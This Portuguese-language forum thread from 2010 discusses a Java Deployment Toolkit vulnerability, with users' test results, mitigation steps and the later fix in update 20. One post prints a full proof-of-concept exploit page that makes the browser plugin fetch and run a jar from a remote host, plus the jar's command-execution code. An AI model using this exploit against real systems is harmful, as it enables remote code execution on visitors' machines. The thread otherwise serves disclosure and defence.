Vocês estão sabendo sobre este assunto? O que acham?
Bug em Java permite ataque de crackers; Sun menospreza falha
S
62 Respostas
F
Provavelmente mais uma falha de overflow… afinal a máquina virtual java é feita em linguagem C…
R
R
A Oracle segue a filosofia que anda em moda hoje em dia:
O importante é vender, funcionar é um detalhe!
U
A Oracle segue a filosofia que anda em moda hoje em dia:O importante é vender, funcionar é um detalhe!
Uma das minhas filosofia é essa também!
vlw
R
A Oracle segue a filosofia que anda em moda hoje em dia:O importante é vender, funcionar é um detalhe!
Uma das minhas filosofia é essa também!
vlw
Pô cara… aí vc me quebrou… pode ser assim nao
U
A Oracle segue a filosofia que anda em moda hoje em dia:O importante é vender, funcionar é um detalhe!
Uma das minhas filosofia é essa também!
vlwPô cara… aí vc me quebrou… pode ser assim nao :D
hum, é mesmo!!
5 motivos para que eu deixe essa filosofia!?!?
PS. Já foi mostrado os 5 motivos!
Não usarei mais essa filosofia!
vlw
T
Não sei até que ponto esta falha afeta muito a plataforma java, mas no mínimo considero um erro de estratégia da Oracle. Deixar um erro de segurança conhecido sem correção por um longo tempo ira causar ainda mais desconfiança da fusão Sun/Oracle.
Do problema em si, acredito que apesar da falha ser séria, não irá afetar muitos usuários, principalmente porque não existe uma tradição em utilizar java para invadir máquinas, além do fato de existirem meios mais fáceis, principalmente em um windows mal configurado…
flw…
R
Pelo que eu vi, a falha não é dificil de ser explorada não…
No meu computador, não funcionou … mas eu nao sei se to com o update…
Para explorer a falha, basta criar um site, com um JWS com determinada linha de comando, que voce conseguiria explorar o pc de alguém…
U
Pelo que eu vi, a falha não é dificil de ser explorada não…No meu computador, não funcionou … mas eu nao sei se to com o update…
Para explorer a falha, basta criar um site, com um JWS com determinada linha de comando, que voce conseguiria explorar o pc de alguém…
Tem como você me passar o que você fez pra testar pra que possa fazer esse teste?
vlw
R
Link com um teste não nocivo
[REMOVIDO, TROJAN]
R
Ormandy suggests the following mitigation advice:
Internet Explorer users can be protected by temporarily setting the killbit on CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA. To the best of my knowledge, the deployment toolkit is not in widespread usage and is unlikely to impact end users.
Mozilla Firefox and other NPAPI based browser users can be protected using File System ACLs to prevent access to npdeploytk.dll. These ACLs can also be managed via GPO.
U
Link com um teste não nocivo[REMOVIDO, TROJAN]
abri no Firefox e abriu a Calculadora!
No Chrome nem tem plugin disponível!
vlw
A
Link com um teste não nocivo[REMOVIDO, TROJAN]
Aqui não funcionou o teste.
Unable to access jarfile.
Usando o IE7 e win XP.
R
O meu tb aconteceu a mesma coisa… no Internet Explorer
No Firefox o NOD 32 barrou o site…
R
Testei em uma máquina XP com JRE 1.6.0_19, tanto no Firefox 3.6.3 quanto no IE 8, e o applet não fez o que se propôs a fazer (abrir a calculadora).
U
Link com um teste não nocivo[REMOVIDO, TROJAN]
Aqui não funcionou o teste.
Unable to access jarfile.
Usando o IE7 e win XP.
Aqui funcionou!
I7 e Firefox!
Abriu a calculadora do Windows!
Só não rodou no Chrome!
vlw
U
ah meu JRE é
[color=red] JRE 1.6.0_16
[/color]
:shock:
vlw
J
aqui abriu também, e detalhe, o nod reconheceu como malware.
R
Pra voces verem como a falha é grave…
E se ao invés de abrir a calculadora… fosse um format c:
:shock:
U
Pra voces verem como a falha é grave…E se ao invés de abrir a calculadora… fosse um format c:
:shock:
eu iria na sua casa lhe bater por ter passado o link!(to zuando)
mais o problema é sério mesmo!
Temos que ver ai eu mesmo vou atualizar meu JRE!
vlw
F
Unable to access jar file, no firefox 3.6.2, alem do que o firefox ficou pedindo pra instalar um plugin, porem nao encontrava o mesmo.
R
O problema é justamente esse… não tem atualização :shock: :shock: :shock:
E a Oracle falou que não vai fazer!!! Só daqui a 3 meses
J
eu iria na sua casa lhe bater por ter passado o link!(to zuando)mais o problema é sério mesmo!
Temos que ver ai eu mesmo vou atualizar meu JRE!vlw
O problema é justamente esse… não tem atualização :shock: :shock: :shock:
E a Oracle falou que não vai fazer!!! Só daqui a 3 meses
usa o jdk7. Vai ver o pessoal antecipou esse problema e corrigiu.
U
eu iria na sua casa lhe bater por ter passado o link!(to zuando)mais o problema é sério mesmo!
Temos que ver ai eu mesmo vou atualizar meu JRE!vlw
O problema é justamente esse… não tem atualização :shock: :shock: :shock:
E a Oracle falou que não vai fazer!!! Só daqui a 3 meses
mais versão do meu 1.6.0_16 e o colega ali acima tem 1.6.0_19!
Ou então deixa rolar!
Por eu uso o Chrome e não executar essas aplicações!
vlw
U
eu iria na sua casa lhe bater por ter passado o link!(to zuando)mais o problema é sério mesmo!
Temos que ver ai eu mesmo vou atualizar meu JRE!vlw
O problema é justamente esse… não tem atualização :shock: :shock: :shock:
E a Oracle falou que não vai fazer!!! Só daqui a 3 meses
usa o jdk7. Vai ver o pessoal antecipou esse problema e corrigiu.
ah beleza vou fazer o download e instalar hoje ainda!
vlw
F
Aqui funcionou tbm, meu JRE é o u19, coisa complicada hein.
Usei so no FireFox
U
Aqui funcionou tbm, meu JRE é o u19, coisa complicada hein.Usei so no FireFox
i agora ferrou tudo! rs
16 roda 19 roda também!
Tem mais alguém ae que no 19 rodou??!!
vlw
M
Sinistro, nao tenho plugin instalado e mesmo assim abriu a calculadora. :shock:
editado: parece que esta instalado sim, desinstalando agora!
L
Por acaso alguém recebeu algum email da Atlassian sugerindo a todos para trocar de senha?
Parece que houve um problema sério lá, sabem me dizer se isso estava ligado com esse exploit?
F
Link com um teste não nocivo[REMOVIDO, TROJAN]
Vocês são doidos em ficar clicando assim né… pelo menos execute esses testes em um máquina virtual, tipo VMWare ou similar… e depois reverta o restore point…
O pior são aqueles que saem clicando e ainda logado como root… aí depois pega um trojan com nível de kernel e aí já viu né… conheço vários pessoas próximas que já tiveram o dinheiro zerado e limite do cheque especial no talo…
Essas vulnerabilidades são super comuns… todo mês aparece 1 ou 2… não tem FireWall ou Anti-Vírus que vai pegar isso, porque esse pessoal que fica instalando Trojan só usa executáveis que nunca foram pegos na assinatura e ainda por cima usam comunicação através do próprio IE… ou seja a porta 80… e ainda com processo atachado ao IE…
M
Por acaso alguém recebeu algum email da Atlassian sugerindo a todos para trocar de senha?Parece que houve um problema sério lá, sabem me dizer se isso estava ligado com esse exploit?
Não. Essa foi por alguem descobriu que Atlassian guarda passwords dos seus clientes em arquivo texto mesmo.
J
Bom dia,
Obrigado santoro pela informação.
Nota : Crackers não são criminosos !! duas coisas differentes. Crime é um adjetivo muito forte nestes casos ...
[b]A segurança do computador é uma questão de ser cuidadosos e estar bem informado.[/b]
Eu à mais de 10 anos sem problemas com vírus, trojans, worms, mas eu vi passar Sasser, I love you ... etc.
O unico vírus que eu tenho em minha máquina chama-se : Norton.
Depois de ter instalado jdk1.6.0_19 e o JRE 1.6.0_19 associado :
Eu testei no Win XP :
---> Mozilla 1.7.13 : Resultado : Nada !
---> Mozilla SeaMonkey 1.1.16 : Resultado : Nada !
---> Mozilla Firefox 3.6.3 : Resultado : Calc
---> Google Chrome 4.1.249.1045 : Resultado : Calc
---> Safari 4.0.5 : Resultado : Calc
---> IE x não utiliso !
---> Opera (Eu não testei)
Soluções :
1- Não instale o JRE apenas JDK (config env vars PATH e JAVA_HOME)
2- Configura o browser para que ele não pode executar Java.
3- Utilise JDK 7 (Eu não testei) https://jdk7.dev.java.net/
4- Outras ??
//-------------------------------------- Code Analysis testcase.html -------------
<html>
<head><title>Java Deployment Toolkit Test Page</title></head>
<body>
<script language="JavaScript">
<!--
function SymError()
{
return true;
}
window.onerror = SymError;
//-->
</script>
<script>
// Tavis Ormandy <[email removido]>, April 2010
var u = "http: -J-jar -J\\\\lock.cmpxchg8b.com\\calc.jar none";
if (window.navigator.appName == "Microsoft Internet Explorer") {
var o = document.createElement("OBJECT");
o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
// Trigger the bug
o.launch(u);
} else {
// Mozilla
var o = document.createElement("OBJECT");
var n = document.createElement("OBJECT");
o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
n.type = "application/java-deployment-toolkit";
document.body.appendChild(o);
document.body.appendChild(n);
// Test both MIME types
try {
// Old type
o.launch(u);
} catch (e) {
// New type
n.launch(u);
}
}
// Bonus Vulnerability, why not downgrade victim to a JRE vulnerable to
// this classic exploit?
// http://sunsolve.sun.com/search/document.do?assetkey=1-66-244991-1
// o.installJRE("1.4.2_18");
</script>
</body>
</html>
//-----------------------------------Code Analysis Main.class in file calc.jar -----------
public class Main
{
public Main()
{
}
public static void main(String args[])
throws Exception
{
Runtime.getRuntime().exec("cmd.exe /c calc.exe");
}
}
Contexto :
O erro está relacionado com o plugin Java Deployment Toolkit encontrado em navegadores web, devido à sua instalação automática com o JRE (Java Runtime Environment). Sugerido como um controle ActiveX para o Internet Explorer ou um plugin NPAPI para o Firefox e outros , Java Deployment Toolkit é considerado seguro e fornece aos desenvolvedores um caminho para distribuir suas aplicações para os usuários finais.
Problema :
Argumentos arbitrários podem ser passados para javaw.exe e executar um arquivo JAR .
Solução :
Desativar o JavaScript não protege contra a exploração da vulnerabilidade. Para o Internet Explorer, parar o ActiveX classe CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA , e para o Firefox para desabilitar o Java Deployment Toolkit a partir do gerenciador de plugins.
Abraços
C
Li esta notícia no trabalho hoje de manhã.
Depois do expediente, fui pesquisar no google algumas características de um celular que estou interessado em comprar.
Entrei em um dos primeiros links do resultado da busca feita no google. Ao carregar a página, percebi um Java Web Start iniciando e pensei: “Ué, mas aonde que tem java nesta página?”.
Não deu 2 minutos o meu antivírus estava avisando que tinha um vírus na minha máquina.
Será que irá acontecer uma onda de ataques utilizando java?
Eu acho um absurdo uma empresa como a Oracle dizer que só irá corrigir este problema de segurança no próximo update, daqui 3 meses, pois acabou de lançar um update agora.
Acredito que o Java tem uma reputação a zelar, mas enfim…
Vamos aguardar para ver o que acontece
Abraços
F
Link com um teste não nocivo[REMOVIDO, TROJAN]
Vocês são doidos em ficar clicando assim né… pelo menos execute esses testes em um máquina virtual, tipo VMWare ou similar… e depois reverta o restore point…
O pior são aqueles que saem clicando e ainda logado como root… aí depois pega um trojan com nível de kernel e aí já viu né… conheço vários pessoas próximas que já tiveram o dinheiro zerado e limite do cheque especial no talo…
Essas vulnerabilidades são super comuns… todo mês aparece 1 ou 2… não tem FireWall ou Anti-Vírus que vai pegar isso, porque esse pessoal que fica instalando Trojan só usa executáveis que nunca foram pegos na assinatura e ainda por cima usam comunicação através do próprio IE… ou seja a porta 80… e ainda com processo atachado ao IE…
Os bancos que resolvam isto pra mim, eu nao tenho nada haver com isto!!
Quem perdeu cheque especial, limite e o escambau e ficou quieto mané que é, os bancos cobrem isto, é obrigaçao deles lhe dar segurança.
C
Os bancos que resolvam isto pra mim, eu nao tenho nada haver com isto!!
Quem perdeu cheque especial, limite e o escambau e ficou quieto mané que é, os bancos cobrem isto, é obrigaçao deles lhe dar segurança.
E depois reclamam dos políticos do pais…
F
Os bancos que resolvam isto pra mim, eu nao tenho nada haver com isto!!
Quem perdeu cheque especial, limite e o escambau e ficou quieto mané que é, os bancos cobrem isto, é obrigaçao deles lhe dar segurança.E depois reclamam dos políticos do pais…
Porque?? Algo errado? Se voce me oferece um sistema a segurança tem que vir junto. Tanto é que todos os casos que tenho conhecimento o banco ressarciu na hora o cliente lesado por fraude.
Inclusive meu cartão quando foi clonado não tive problema algum, alias a propria operadora identificou pra mim e tomou todas as ações.
Nao misture as coisas, nao estamos falando de politica. Estamos falando de produtos e empresas e na segurança destes produtos.
M
Os bancos que resolvam isto pra mim, eu nao tenho nada haver com isto!!
Quem perdeu cheque especial, limite e o escambau e ficou quieto mané que é, os bancos cobrem isto, é obrigaçao deles lhe dar segurança.E depois reclamam dos políticos do pais…
Porque?? Algo errado? Se voce me oferece um sistema a segurança tem que vir junto. Tanto é que todos os casos que tenho conhecimento o banco ressarciu na hora o cliente lesado por fraude.
Inclusive meu cartão quando foi clonado não tive problema algum, alias a propria operadora identificou pra mim e tomou todas as ações.Nao misture as coisas, nao estamos falando de politica. Estamos falando de produtos e empresas e na segurança destes produtos.
Acho que ele pensa que todo cidadão deveria ser especialista em segurança na rede.
E
Aqui abriu a Calculadora :roll:
W
Será que tem relação
com James Gosling confirma sua saída da Oracle?
V
Vou trancar o tópico pq o código está gerando transtornos para o pessoal. Aqui acusou no anti-vírus também.
V
Atendendo a pedidos, desbloqueei o tópico e removi todos os links acima.
A
A Oracle segue a filosofia que anda em moda hoje em dia:O importante é vender, funcionar é um detalhe!
Seria complicado se até os produtos que eles vendem fosse assim. Para abaixar a poeira vamos considerar que isso só rola com o Java, porque ele não é vendido!
ahsuahusha
V
Atualização daqui 3 meses ?
Humm… Entendi, a Oracle deu um prazo de 3 meses para pensar quantos cobrar pela a atualização, do jeito que as coisas andam eu não dúvido nada.
L
Olá
Seria bom alguém repetir estes testes com a versão 20 lançada hoje http://java.sun.com/javase/downloads/widget/jdk6.jsp
Release notes em http://java.sun.com/javase/6/webnotes/6u20.html
[]s
Luca
R
Uai… pode ser então… que a Oracle resolveu se mecher…
Soltou uma versão nova…
G
Só três meses?
É o tipo de atitude que faz qualquer um chorar de raiva.
Alguém tem mais informação sobre o código bugado?
K
A Sun que eu saiba acabou e Java segundo todos falam é robusto e seguro, logo se vê como vai ser o compromisso da Oracle com o Java, cai por terra o termo seguro depois dessa.
U
NuncaAAAAA
vlw
F
Update 20 corrigiu a falha, aqui não deu problema mais
M
Creio que isso cala os profetas do caos que mal podem esperar uma atualizaçao de segurança.
Acho que o pessoal esqueceu que o IE já ficou 300 dias no ano com pelo menos uma falha de segurança grave sem correção, dentre outros softwares.
L
Atualizem o Jdk 6 Update 20.
Ja está corrigido, ainda bem…
R
Creio que isso cala os profetas do caos que mal podem esperar uma atualizaçao de segurança.
Acho que o pessoal esqueceu que o IE já ficou 300 dias no ano com pelo menos uma falha de segurança grave sem correção, dentre outros softwares.
Mas o problema é que a Oracle falou que não iria corrigir, mudaram de ideia…
E essa falha é uma das mais graves que já vi… basta o cara entrar no site… nao precisa clicar nada… aceitar nada… pronto… já foi infectado …
E a infecçao vai de um simples abrir calculadora… a um format c:
E é bem fácil explorar essa falha
L
Creio que isso cala os profetas do caos que mal podem esperar uma atualizaçao de segurança.
Acho que o pessoal esqueceu que o IE já ficou 300 dias no ano com pelo menos uma falha de segurança grave sem correção, dentre outros softwares.
Mas o problema é que a Oracle falou que não iria corrigir, mudaram de ideia…
E essa falha é uma das mais graves que já vi… basta o cara entrar no site… nao precisa clicar nada… aceitar nada… pronto… já foi infectado …
E a infecçao vai de um simples abrir calculadora… a um format c:
E é bem fácil explorar essa falha
WTF? Abre um format c: ?
Mais tipo o format c: não funcionaria pois a unidade estaria em uso, correto?
R
WTF? Abre um format c:?
Mais tipo o format c: não funcionaria pois a unidade estaria em uso correto?
Correto…
Mas com um trabalho mais elaborado… daria pra fazer
L
WTF? Abre um format c:?
Mais tipo o format c: não funcionaria pois a unidade estaria em uso correto?Correto…
Mas com um trabalho mais elaborado… daria pra fazer
Justamente pelos transtornos que essa falha poderia causar (e como ja foi dito, seriam grandes transtornos) a Oracle decidiu atualizar.
Não sei se alguem ja percebeu, mas o a microsoft descobre dezenas de bug do Windows por dia, por isso quase todo dia tem uma atualização.
F
Conheço softwares open source que estão mais de 5 anos com vulnerabilidade… o problema é que a grande maioria das vulnerabilidades não são divulgadas e logo não corrigidas…
A linguagem Java não permite overflows, pois ela não permite acesso direto de memória… o conceito funciona… mas as implementações são feitas em C/C++… logo não é a linguagem que é insegura, e sim a aplicação…
Seria a mesma coisa que invadir um Windows Host rodando o WMware com Windows Slave… teoricamente é impossível… mas vai que o próprio WMware esteja com problema…
E esse problema do Java nem é overflow… me parece que o problema é similar daquele problema do protocolo HTTP no qual com um ? podia simular outros sites… e depois foi removido da especificação… pois muitas pessoas estavam usando isso para forjar sites…
J
Bom dia,
ViniGodoy : { Vou trancar o tópico pq o código está gerando transtornos para o pessoal.
.............
Atendendo a pedidos, desbloqueei o tópico e removi todos os links acima.
}
[b]Se o Instituto Pasteur estivesse com medo de vírus ou que era de nós , nossa senhora !!![/b]
Diante de um problema, não podemos esconder a realidade. E ORACLE entendeu muito bém isso.
Especialmente porque este erro é um [b]segredo aberto[/b], em qualquer fórum ele està explicado. E em todas as linguas ...
Tests com o JDK 1.6.0_20 :
Depois de ter instalado jdk1.6.0_20 e o JRE 1.6.0_20 associado :
Eu testei no Win XP :
—> Mozilla 1.7.13 : Resultado : OK !
—> Mozilla SeaMonkey 1.1.16 : Resultado : OK !
—> Mozilla Firefox 3.6.3 : Resultado : OK !
—> Google Chrome 4.1.249.1045 : Resultado : OK !
—> Safari 4.0.5 : Resultado : OK !
—> Opera 10.51 : Resultado : OK ! Nota : OPERA é um excelente navegador !!
—> IE x não utiliso esta porcar… !
Agora que tudo voltou ao normal, até a próxima vez.
Para aqueles que estão curiosos, aqui está a história :
http://jxme.online.fr/._java/BUG_JAVA_JDT.txt
Abraços
F
Na minha opinião nenhuma informação ou link deveria ser excluído… pela minha experiência falhas amplamente divulgadas são as que são corrigidas mais rápidas…
Toda falha grave deveria ser divulgada, inclusive mostrando como explorar… falta de conhecimento ou ignorância é que é prejudicial…
Eu já vi meios de invadir que por ignorância ou falta de conhecimento julgava impossível de fazer… mas quando a informação é posta ao público ou mostrada é que se percebe o quão grave é a coisa… tem gente que pensa que anti-vírus ou firewall serve para barrar trojans… enquanto que na verdade só barra aplicações de brincadeirinhas… tipo NetBus ou BackOrifice… as verdadeiras aplicações não são pegas, pois nem se sabe a assinatura dela e poucas pessoas conhecem…
O pior são os leigos que falam que o Linux/Unix não pega Vírus/Trojan… 2/3 dias atrás vi(na TV Cultura) um cara totalmente leigo se dizendo entendido do assunto e falando uma asneira atrás da outra… imagine quantas mil pessoas vão aprender errado vendo um leigo falando na TV…
Tem gente que pensa que Windows 3.11/95/98 usa arquitetura de um Windows NT… e pensa que não existe prioridade de Threads e não existe conceito de usuários Root…
Vale lembrar que os primeiros Vírus e Trojans surgiram no mundo Unix… acontece que esses sistemas são usados em MainFrames de Bancos, Telecom, Energia Elétrica e etc… e não é um usuário comum que fica usando… e sim pessoas altamente capacitadas… se alguém aqui já mexeu em alguns desses sistemas vai ver que é uma burocracia fenomenal para ter acesso físico aos mesmos… fora a segurança física envolvida…
É igual mudar um menu no Windows hoje em dia… tem gente que pensa que é só meter código C/C++ e pronto… mas na verdade passa por uma 10 áreas distintas para se mudar um simples botão e demora meses…
F
fiz pra testar aqui em casa e nao deu certo, eu mudei para
var u = “http: -J-jar -J\\meusite\calc.jar none”;
e da um error: "unable to access jarfile: \meusite\calc.jar "
a vulnerabilidade ja foi corrigida ?
java 1.6.0_19.
P
Alguem sabe como era o bug?
=P
G
Com seis pernas e um par de antenas.
ug
b
g bug
u bug
bugbug b g
bug bugbug bu
bug bugbugbugbugbugbug
bug bug bugbugbugbugbugbugbugbugb
bug bug bugbugbugbugbugbugbugbugbu
bugbugbugbu gbugbugbugbugbugbugbugbugbu
bugbugbugbug
bugbugbugbu gbugbugbugbugbugbugbugbugbu
bug bug bugbugbugbugbugbugbugbugbu
bug bug gbugbugbugbugbugbugbugbugb
bug bugbugbugbugbugbug
bug bugbug bu
bugbug b g
u bug
g bug
b
ug
U
Com seis pernas e um par de antenas.
ug b g bug u bug bugbug b g bug bugbug bu bug bugbugbugbugbugbug bug bug bugbugbugbugbugbugbugbugb bug bug bugbugbugbugbugbugbugbugbu bugbugbugbu gbugbugbugbugbugbugbugbugbu bugbugbugbug bugbugbugbu gbugbugbugbugbugbugbugbugbu bug bug bugbugbugbugbugbugbugbugbu bug bug gbugbugbugbugbugbugbugbugb bug bugbugbugbugbugbug bug bugbug bu bugbug b g u bug g bug b ug
Nossa, que criatividade!
Me ensina a fazer isso?
Mr. BUG
rsrs
vlw
Criado 12 de abril de 2010
Ultima resposta 19 de abr. de 2010
Respostas 62
Participantes 27
Alura Metodologia Ágil - O que é? Saiba o que são as Metodologias Ágeis e como implementar na sua empresa para garantir projetos mais dinâmicos e eficazes.
Casa do Codigo Casa do Codigo — Livros de tecnologia Livros de programacao, infraestrutura e inovacao
Fiap Graduacao em Tecnologia — FIAP Analise e Desenvolvimento de Sistemas, Engenharia de Software e mais